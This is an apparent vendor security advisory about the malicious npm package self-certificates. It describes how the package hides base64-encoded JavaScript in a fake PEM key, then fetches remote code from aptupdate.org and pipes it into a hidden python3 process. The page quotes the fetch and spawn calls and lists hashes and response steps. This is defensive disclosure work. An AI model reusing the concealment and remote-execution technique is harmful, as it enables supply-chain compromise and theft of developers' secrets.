Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

self-certificatesnpm

Advisory published Updated

self-certificates is a confirmed malicious npm package (MAL-2026-14543) that executes malicious code on install (malicious versions 1.0.1, 1.0.2, 1.0.3…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in self-certificates (npm)

MAL-2026-14543
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall self-certificates

What this malware does

Package advertised as a self-signed TLS certificate generator ships a fake RSA private key at test/key.pem whose body, once the PEM headers are stripped and the middle is base64-decoded, is JavaScript that calls fetch('https://aptupdate.org/settings/privacy.php') and pipes the response into a detached, window-hidden python3 process via spawn('python3', ['-'], {detached:true, windowsHide:true}) with p.stdin.write(log). index.js reads test/key.pem, strips the '-----BEGIN/END RSA PRIVATE KEY-----' markers, base64-decodes the payload, converts it to a UTF-8 string, and passes it as the third argument to selfsign.generate() from the paired 'self-sign' dependency, which executes the decoded string. The destination URL inside the payload is itself base64-encoded ('aHR0cHM6...' decoding to aptupdate.org/settings/privacy.php). Using a PEM wrapper to smuggle JavaScript into a package presenting itself as a certificate helper, then routing the decoded string to a dependency that evaluates it, is a multi-stage dropper for arbitrary attacker-controlled code on the installer's machine.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

27 flagged
1.0.11.0.21.0.31.0.41.0.51.0.61.0.71.0.81.0.91.1.11.1.21.1.31.1.41.1.51.1.61.1.71.1.81.1.91.2.01.2.21.2.31.2.41.2.51.2.61.2.71.2.81.2.9

Indicators of compromise (SHA-256)

8a99096f4afe74fe32b56b50df1e93fa15193616360c3656af701ce06bc42183
b05a70c9af1bc8fa00f9481f7ea36715a94d7d3442b8fc86d662fbc05abdf4c9
d08fd4bf18821b6e7e2632699428553b122619654fd8b3ecd57b29480525fbc8
14b401edce199203c9fe695d49e0b59473e6cad13f3eccf3a4f363551a6cf054
623537b06a5226e15a968c6e6a97f9ae7c15155cfdab3dab9dae3d6ff36c57aa
d6dccd8b5feaa376d6fea3bc3602a9560e6f6e31b06d04113ed261bce16d4cfc
ee1aa2b6af5a3f21fe06b20de0fc2798e076f42df8e5a098b321b5ab0e84331f
675a8408727e1a60b6ac56f21ac24c4f6a9bafd422d48ec46efcfa2d41d91b01
72545579c047373929b5191374e2ad01f17c3f8e1d0a4fbbd11feb31a2d0cb08
b7ee4f7d224bee9019d0992d64a6dcac4793b6ea4f19962e4b95220f313f366e
ced9167241d391937ba7b1f2625aa3f8184d832ebc61c182936100ae3a3f13bd
e2d8bddfb73bbc417379d2946be2d552167bc9fcdd27fcaae97df4a51b81888c
f8b5be53b61c2ae06d4a66172c26669cc807001846bbf88224bbd957c7488b42
173cdaecb374d094253ee1f8790d6d40dfe0dc4218d8652fdc664da815e0c941
2f65eb831a23e5b0eb62eef828d5f25d17976bdd01ee7e17dedddfca7a838f93
4d10a5b00f4ed0fa58f7ebe6cdc1583e534627e70c4617b4aafefff7c68d5b2f
5e7a2ca526c7f9deace4feb45f5dc442de09b172cc41574480626b7462f28557
a465f84af3276c24f0dd9a459b5f27a4b3c6aeecb48c9420b4a14a0d67f1c2d2
c4cb24f7d867a1dca2ee732d6ab864260d3059390fc67bd5f1b98577e15653c7
ed5c97c2592394f1c492812f980d6ef03e72fcf2040dc37264cf863070cbd138
155e735ba183caa19716c325a507fa445e0600a0b74d579d2680b1a607528cea
40466589d15ae378f3baec5e0c854f7031697c4b40991b45141fc71acef66251
47bd73386af9c697caa632fbce598d1a9ae81d8f76d4417b40669e7e1b220a52
776fa63cde433e98fcdd71b48039878c57da439b202b3e63406c220a24194429
811f9e1cd7ae8783785eb6f4753f7b0ed78feacb5efd9b3e3f6cdb3ee622b196
93ffe2028589d3b08a1100ae91af8962f22d7f2db90ae9d5b97be1f11eedb514
5ce836e647c916aa5d27f031d1107098c0f3df1863dca8e9355a9b02ebfa7fe4
cac10b3c572d48eb2ba3ab936e868de0f968ea5e2b74731e45596688db2c93b6

Detection & response playbook

Malicious package
  1. Find it

    Search your lockfiles and build artifacts for self-certificates (27 malicious versions).

  2. If you installed it — respond

    Remove self-certificates from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If self-certificates was installed, its post-install payload may already have run. Removing the package does not undo that — check outbound connections and credential use from the install window onward.

Frequently asked questions

No. self-certificates on npm has been identified as a malicious package (versions 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, and 19 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

GHSA-rwg4-cx82-h5hqIN-MAL-2026-018767IN-MAL-2026-018765IN-MAL-2026-018761IN-MAL-2026-018775IN-MAL-2026-018789IN-MAL-2026-018786IN-MAL-2026-018791IN-MAL-2026-018778IN-MAL-2026-018774IN-MAL-2026-018780IN-MAL-2026-018773IN-MAL-2026-018763IN-MAL-2026-018770IN-MAL-2026-018790IN-MAL-2026-018764IN-MAL-2026-018768IN-MAL-2026-018787IN-MAL-2026-018783IN-MAL-2026-018769IN-MAL-2026-018777IN-MAL-2026-018766IN-MAL-2026-018776IN-MAL-2026-018771IN-MAL-2026-018779IN-MAL-2026-018772IN-MAL-2026-019242IN-MAL-2026-019243

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks self-certificates-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Explore

self-certificates (npm) malicious package — MAL-2026-14543 | O3 Security